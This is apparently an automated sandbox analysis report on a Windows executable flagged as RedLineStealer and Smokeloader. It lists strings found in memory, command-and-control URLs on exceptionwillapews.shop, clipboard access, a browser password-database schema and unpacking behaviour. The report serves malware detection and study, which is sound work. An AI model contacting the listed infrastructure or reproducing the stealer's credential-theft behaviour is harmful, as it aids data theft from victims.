            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1663701289.000000000544F000.00000004.00000800.00020000.00000000.sdmp, 5Dw2hTQmiB.exe, 00000000.00000003.1663787239.0000000005438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1663701289.000000000544F000.00000004.00000800.00020000.00000000.sdmp, 5Dw2hTQmiB.exe, 00000000.00000003.1663787239.0000000005438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1663701289.000000000544F000.00000004.00000800.00020000.00000000.sdmp, 5Dw2hTQmiB.exe, 00000000.00000003.1663787239.0000000005438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1682521833.0000000003083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1682521833.0000000003083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1663701289.000000000544F000.00000004.00000800.00020000.00000000.sdmp, 5Dw2hTQmiB.exe, 00000000.00000003.1663787239.0000000005438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1663701289.000000000544F000.00000004.00000800.00020000.00000000.sdmp, 5Dw2hTQmiB.exe, 00000000.00000003.1663787239.0000000005438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1663701289.000000000544F000.00000004.00000800.00020000.00000000.sdmp, 5Dw2hTQmiB.exe, 00000000.00000003.1663787239.0000000005438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: 5Dw2hTQmiB.exe, 00000000.00000002.1857457436.0000000002FCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://exceptionwillapews.shop/
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1672129277.0000000003075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://exceptionwillapews.shop/2
            Source: 5Dw2hTQmiB.exe, 00000000.00000002.1857457436.0000000003006000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://exceptionwillapews.shop/RR
            Source: 5Dw2hTQmiB.exe, 00000000.00000002.1857457436.000000000306C000.00000004.00000020.00020000.00000000.sdmp, 5Dw2hTQmiB.exe, 00000000.00000003.1672129277.0000000003075000.00000004.00000020.00020000.00000000.sdmp, 5Dw2hTQmiB.exe, 00000000.00000002.1857457436.0000000003006000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://exceptionwillapews.shop/api
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1672129277.0000000003075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://exceptionwillapews.shop/api%
            Source: 5Dw2hTQmiB.exe, 00000000.00000002.1857457436.000000000306C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://exceptionwillapews.shop/apiM
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1672129277.0000000003075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://exceptionwillapews.shop/apiO
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1672129277.0000000003075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://exceptionwillapews.shop/kdh
            Source: 5Dw2hTQmiB.exe, 00000000.00000002.1857457436.000000000306C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://exceptionwillapews.shop/s
            Source: 5Dw2hTQmiB.exe, 00000000.00000002.1857457436.000000000306C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://exceptionwillapews.shop/sm
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1682521833.0000000003083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1663210788.000000000547E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1682178113.000000000554A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1682178113.000000000554A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1663210788.000000000547C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1663210788.000000000547C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1663701289.000000000544F000.00000004.00000800.00020000.00000000.sdmp, 5Dw2hTQmiB.exe, 00000000.00000003.1663787239.0000000005438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1682521833.0000000003083000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1663701289.000000000544F000.00000004.00000800.00020000.00000000.sdmp, 5Dw2hTQmiB.exe, 00000000.00000003.1663787239.0000000005438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1682178113.000000000554A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1682178113.000000000554A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1682178113.000000000554A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1682178113.000000000554A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1682178113.000000000554A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownHTTPS traffic detected: 104.21.44.10:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.44.10:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.44.10:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.44.10:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.44.10:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.44.10:443 -> 192.168.2.4:49735 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.44.10:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.44.10:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_0042DDE0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_0042DDE0
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_0042DDE0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_0042DDE0

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 00000000.00000002.1857426384.0000000002FA3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_004251830_2_00425183
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_004216700_2_00421670
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_00415B570_2_00415B57
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_00404C400_2_00404C40
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_00421F800_2_00421F80
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_004100600_2_00410060
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_0041D1280_2_0041D128
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_0043B1300_2_0043B130
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_004082500_2_00408250
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_004042600_2_00404260
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_004033700_2_00403370
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_0043B4700_2_0043B470
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_004364800_2_00436480
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_004066100_2_00406610
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_004216CE0_2_004216CE
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_004037700_2_00403770
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_004058900_2_00405890
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_00406C200_2_00406C20
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_0041DD720_2_0041DD72
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_00426E670_2_00426E67
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_00426F290_2_00426F29
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_00426FA00_2_00426FA0
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_02EF02C70_2_02EF02C7
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_02EE12670_2_02EE1267
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_02F072070_2_02F07207
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_02F053EA0_2_02F053EA
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_02F1B3970_2_02F1B397
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_02F070CE0_2_02F070CE
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_02F021E70_2_02F021E7
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_02F071900_2_02F07190
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_02F166E70_2_02F166E7
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_02F1B6D70_2_02F1B6D7
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_02EE44C70_2_02EE44C7
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_02EE84B70_2_02EE84B7
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_02EE35D70_2_02EE35D7
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_02EE5AF70_2_02EE5AF7
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_02EE68770_2_02EE6877
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_02EE39D70_2_02EE39D7
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_02EE4EA70_2_02EE4EA7
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_02EF5DBE0_2_02EF5DBE
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: String function: 00408C90 appears 42 times
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: String function: 02EE9547 appears 160 times
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: String function: 004092E0 appears 160 times
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: String function: 02EE8EF7 appears 40 times
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6988 -s 1624
            Source: 5Dw2hTQmiB.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 00000000.00000002.1857426384.0000000002FA3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000000.00000002.1857268208.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@1/1
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_02FA3E16 CreateToolhelp32Snapshot,Module32First,0_2_02FA3E16
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_0042A936 CoCreateInstance,0_2_0042A936
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6988
            Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\e12724af-7770-4d25-b7a3-72d30fc67dc8Jump to behavior
            Source: 5Dw2hTQmiB.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 5Dw2hTQmiB.exe, 00000000.00000003.1663523341.0000000005454000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 5Dw2hTQmiB.exeVirustotal: Detection: 44%
            Source: 5Dw2hTQmiB.exeReversingLabs: Detection: 34%
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile read: C:\Users\user\Desktop\5Dw2hTQmiB.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\5Dw2hTQmiB.exe "C:\Users\user\Desktop\5Dw2hTQmiB.exe"
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6988 -s 1624
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: msvcr100.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

            Data Obfuscation

            barindex
            Detected unpacking (changes PE section rights)
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeUnpacked PE file: 0.2.5Dw2hTQmiB.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeUnpacked PE file: 0.2.5Dw2hTQmiB.exe.400000.0.unpack
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_0043F5AC push esi; retn 0048h0_2_0043F5AD
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_0043FC64 push eax; iretd 0_2_0043FC65
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_00440C13 push ecx; ret 0_2_00440C17
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_0043FC98 push AA77266Eh; iretd 0_2_0043FC9D
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_0043FD86 pushfd ; ret 0_2_0043FD87
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_02EFEB9C push ebp; ret 0_2_02EFEBA1
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_02F00853 push esp; retf 0_2_02F0085B
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_02EFFE80 push ecx; retf 0_2_02EFFE8C
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_02FA7321 push ebp; iretd 0_2_02FA74BF
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_02FA7467 push ebp; iretd 0_2_02FA74BF
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeCode function: 0_2_02FA8DB9 pushad ; ret 0_2_02FA8DBA
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
